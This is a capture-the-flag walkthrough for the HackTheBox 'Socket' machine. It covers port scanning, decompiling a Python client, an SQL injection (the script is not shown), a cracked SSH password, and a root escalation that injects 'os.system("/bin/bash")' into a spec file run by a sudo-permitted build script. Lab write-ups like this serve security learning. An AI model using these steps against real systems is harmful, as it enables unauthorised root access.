https://app.hackthebox.com/machines/Socket
Socket is newly released Open Beta Season Medium, Linux box from hackthebox.
Let’s Start
Nmap Output
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-29 13:35 EDT
Nmap scan report for qreader.htb (10.10.11.206)
Host is up (0.079s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 4fe3a667a227f9118dc30ed773a02c28 (ECDSA)
|_ 256 816e78766b8aea7d1babd436b7f8ecc4 (ED25519)
80/tcp open http Apache httpd 2.4.52
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
| http-methods:
|_ Supported Methods: OPTIONS GET HEAD
| http-server-header:
| Apache/2.4.52 (Ubuntu)
|_ Werkzeug/2.1.2 Python/3.10.6
5789/tcp open unknown
| fingerprint-strings:
| GenericLines, GetRequest, HTTPOptions, RTSPRequest:
| HTTP/1.1 400 Bad Request
| Date: Wed, 29 Mar 2023 17:36:42 GMT
| Server: Python/3.10 websockets/10.4
| Content-Length: 77
| Content-Type: text/plain
| Connection: close
| Failed to open a WebSocket connection: did not receive a valid HTTP request.
| Help, SSLSessionReq:
| HTTP/1.1 400 Bad Request
| Date: Wed, 29 Mar 2023 17:36:58 GMT
| Server: Python/3.10 websockets/10.4
| Content-Length: 77
| Content-Type: text/plain
| Connection: close
|_ Failed to open a WebSocket connection: did not receive a valid HTTP request.
[REDACTED]
add “qreader.htb” in hosts file
Browsing the site it shows something like this
Download the app , the site is running with flask . so let’s assume the app is also built with python
i’m using pyinstxtractor to decompile the app
wget https://raw.githubusercontent.com/extremecoders-re/pyinstxtractor/master/pyinstxtractor.py
python pyinstxtractor.py app/qreader.exe
cd to output folder & Extract the pyc file
pip3 install uncompyle6
uncompyle6 qreader.pyc > qreader.py
analyzing the code there is a vulnerability in this part of code
Again let’s try out the vulnerability scan of websocket in port 5789 with STEWS
python3 STEWS-vuln-detect.py -1 -n -u qreader.htb:5789
Let’s make a script to exploit the sql injection found from from the above source code
some usernames are found, looks great. 😍
here let’s try to get the password
here is the password which can be easily cracked with crackstation
password: “denjanjade122566”
ssh it & get the user.txt
i’ve to try several times as username is tricky “tkeller”
uh! initial access done :D
Privilege Escalation
running “sudo -l” gives this
reviewing the “build-installer.sh” file it seems os command can be run as root.
let’s get to the root…
echo 'import os;os.system("/bin/bash")' > b17.spec
sudo /usr/local/sbin/build-installer.sh build b17.spec
& it’s done !
Let’s hope to see you again with some juicy stuff.
Untill Then This is badboy_17 & I really do Thank you for joining with me.♥️